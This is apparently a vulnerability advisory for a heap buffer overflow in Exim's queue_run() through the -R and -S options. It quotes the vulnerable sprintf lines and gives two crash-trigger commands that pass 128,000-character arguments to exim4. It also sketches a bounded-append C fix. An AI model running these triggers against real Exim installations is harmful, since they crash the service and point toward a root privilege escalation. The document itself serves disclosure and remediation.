========================================================================
CVE-2020-SPRSS -- Heap buffer overflow in queue_run()
========================================================================

Through the -R deliver_selectstring and -S deliver_selectstring_sender
options, the "exim" user can overflow the heap-based big_buffer in
queue_run() (lines 419 and 423):

 412   p = big_buffer;
 ...
 418   if (deliver_selectstring)
 419     p += sprintf(CS p, " -R%s %s", f.deliver_selectstring_regex? "r" : "",
 420       deliver_selectstring);
 421
 422   if (deliver_selectstring_sender)
 423     p += sprintf(CS p, " -S%s %s", f.deliver_selectstring_sender_regex? "r" : "",
 424       deliver_selectstring_sender);

/usr/sbin/exim4 -R "`perl -e 'print "A" x 128000'`"
Program received signal SIGSEGV, Segmentation fault.

/usr/sbin/exim4 -S "`perl -e 'print "A" x 128000'`"
Program received signal SIGSEGV, Segmentation fault.

We have not tried to exploit this vulnerability; if exploitable, it
would allow an attacker who obtained the privileges of the "exim" user
to obtain full root privileges.
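
As an added illustration (not Exim's code and not the fix that was shipped), the same string assembly can be written with a bounded append that refuses over-long -R/-S arguments instead of writing past the end of the buffer. The names append_bounded and build_select_text and the 16384-byte buffer size are assumptions of this sketch.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define BIG_BUFFER_SIZE 16384  /* assumed size, for this sketch only */

/* Append formatted text at *pp inside buf[0..size). Returns 0 on success,
   -1 if the text would not fit (buffer is left terminated at *pp). */
static int append_bounded(char *buf, size_t size, char **pp, const char *fmt, ...)
{
  size_t room = size - (size_t)(*pp - buf);   /* always >= 1, see below */
  va_list ap;
  va_start(ap, fmt);
  int n = vsnprintf(*pp, room, fmt, ap);      /* n = length it wanted to write */
  va_end(ap);
  if (n < 0 || (size_t)n >= room) { **pp = '\0'; return -1; }
  *pp += n;                                   /* n < room keeps *pp in bounds */
  return 0;
}

/* Stand-in for the queue_run() fragment: builds the " -R.. -S.." text.
   Returns the length written, or -1 if an argument is too long. */
int build_select_text(char *buf, size_t size,
                      const char *selectstring, int is_regex,
                      const char *sender, int sender_is_regex)
{
  char *p = buf;
  if (size == 0) return -1;
  *p = '\0';
  /* The advisory's pattern, p += sprintf(p, " -R%s %s", ...), has no bound. */
  if (selectstring && append_bounded(buf, size, &p, " -R%s %s",
                                     is_regex ? "r" : "", selectstring) < 0)
    return -1;
  if (sender && append_bounded(buf, size, &p, " -S%s %s",
                               sender_is_regex ? "r" : "", sender) < 0)
    return -1;
  return (int)(p - buf);
}

int main(void)
{
  static char big_buffer[BIG_BUFFER_SIZE];
  static char long_arg[128001];               /* constructed input: 128000 'A's */
  memset(long_arg, 'A', sizeof long_arg - 1);
  printf("%d\n", build_select_text(big_buffer, sizeof big_buffer, "example.org", 0, NULL, 0));
  printf("%d\n", build_select_text(big_buffer, sizeof big_buffer, long_arg, 0, NULL, 0));
  return 0;
}
```

The caller treats -1 as a fatal argument error, so an over-long selector is rejected before any write reaches the end of the buffer.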

